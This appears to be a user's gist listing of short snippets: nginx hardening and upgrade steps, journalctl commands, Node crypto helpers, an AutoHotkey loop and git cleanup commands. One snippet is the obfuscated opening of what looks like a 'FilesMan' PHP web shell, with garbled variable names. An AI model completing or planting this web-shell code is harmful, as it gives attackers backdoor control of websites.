kosinix

Securing NGINX

Hide nginx version

server_tokens off;

HTTP Strict Transport Security (HSTS) policy

HSTS is a security feature that ensures connections to your server occur only over HTTPS, thereby mitigating risks associated with protocol downgrade attacks and improving overall security by enforcing secure connections.

add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload";

kosinix

Read last lines

journalctl -u hris -n 50 -f

Download

journalctl -u hris -S today --no-tail > hris.log

kosinix

Upgrade nginx 1.18.0 to 1.26.1

Ubuntu 20.04, 22.04

Install the prerequisites:

sudo apt install curl gnupg2 ca-certificates lsb-release ubuntu-keyring

Import an official nginx signing key so apt could verify the packages authenticity. Fetch the key:

kosinix

const crypto = require('crypto')
const { readFileSync } = require('fs')

const getHash = (fileBuffer) => {
    const hashSum = crypto.createHash('sha256')
    hashSum.update(fileBuffer)
    const hex = hashSum.digest('hex')
    return hex
}

kosinix

SetTitleMatchMode, 2

Loop
{
    WinActivate, Chrome
    Sleep, 5000
}

kosinix

// Sort array based on array of sorted IDs

let unsorted = [
  {
    id: 'bcd'
  },
  {
    id: 'abc'
  }
]

kosinix

<?php

$â–› = "";
$â–˜ = true;
$▜ = 'UTF-8';
$â–š = 'FilesMan';
$â–™ = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
	prototype(md5($_SERVER['HTTP_HOST'])."key", $â–™);
}

kosinix

killall -9 node

kosinix

/**
 * Generates random string and password hashing
 * @type {module:crypto}
 */

//// Core modules
const crypto = require('crypto');
const util = require('util');

//// External modules

kosinix

git rm -r --cached . 
git add .
git commit -m 'Removed all files that are in the .gitignore'